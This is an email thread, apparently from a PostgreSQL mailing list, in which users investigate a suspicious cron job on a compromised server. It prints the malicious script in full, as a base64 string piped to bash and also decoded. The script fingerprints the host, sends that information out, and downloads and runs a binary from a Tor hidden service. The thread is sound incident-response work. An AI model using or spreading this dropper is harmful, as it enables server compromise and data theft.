Hey Antonis,
If you decode the below Base64 code, you will see the following bash script that is tried to execute on your machine;
x8C8W8llVk0Rzccy9N0ggCOI2VBAcexec &>/dev/nullexport PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbind=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)c=$(echo "curl -4fsSLkA- -m200")t=$(echo "4iucigxvlfx4vcqn5sordersaa3a3ztjcaoszptxxo5b3pbn6nlwsfad")sockz() {n=(dns.twnic.tw doh-ch.blahdns.com doh-de.blahdns.com doh-fi.blahdns.com doh-jp.blahdns.com doh.li doh.pub doh-sg.blahdns.com fi.doh.dns.snopyta.org dns.digitalsize.net)p=$(echo "dns-query?name=relay.tor2socks.in")q=${n[$((RANDOM%${#n[@]}))]}s=$($c https://$q/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|tail -1)}fexe() {for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done}u() {sockzf=/int.$(uname -m)x=./$(date|md5sum|cut -f1 -d-)r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$rchmod +x $x;$x;rm -f $x}for h in tor2web.in tor2web.itdoif ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; thenfexe;u $t.$hls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)elsebreakfidone
02.01.2023, 11:37, "Antonis Christodoulou" <christan305@xxxxxxxxxxx>:
Hey Matthias, here it is:christan@vultr:~$ sudo cat /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh#!/bin/bashexec &>/dev/nullecho x8C8W8llVk0Rzccy9N0ggCOI2VBAcecho eDhDOFc4bGxWazBSemNjeTlOMGdnQ09JMlZCQWMKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAiNGl1Y2lneHZsZng0dmNxbjVzb3JkZXJzYWEzYTN6dGpjYW9zenB0eHhvNWIzcGJuNm5sd3NmYWQiKQoKc29ja3ooKSB7Cm49KGRucy50d25pYy50dyBkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYWhkbnMuY29tIGRvaC1maS5ibGFoZG5zLmNvbSBkb2gtanAuYmxhaGRucy5jb20gZG9oLmxpIGRvaC5wdWIgZG9oLXNnLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmRpZ2l0YWxzaXplLm5ldCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnE9JHtuWyQoKFJBTkRPTSUkeyNuW0BdfSkpXX0Kcz0kKCRjIGh0dHBzOi8vJHEvJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8dGFpbCAtMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bashOn 2 Jan 2023, at 9:46 AM, Matthias Apitz <guru@xxxxxxxxxxx> wrote:El día lunes, enero 02, 2023 a las 08:53:32a. m. +0200, Antonis Christodoulou escribió:
And for the record, Ahmet, here’s a weird cron job:
christan@vultr:~$ sudo crontab -l -u postgres
13 * * * * /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &
Had no idea somebody can add something like this externally...
Please post the content of this script.
matthias
--
Matthias Apitz, ✉ guru@xxxxxxxxxxx, http://www.unixarea.de/ +49-176-38902045
Public GnuPG key: http://www.unixarea.de/key.pub
İyi çalışmalar
Best Regards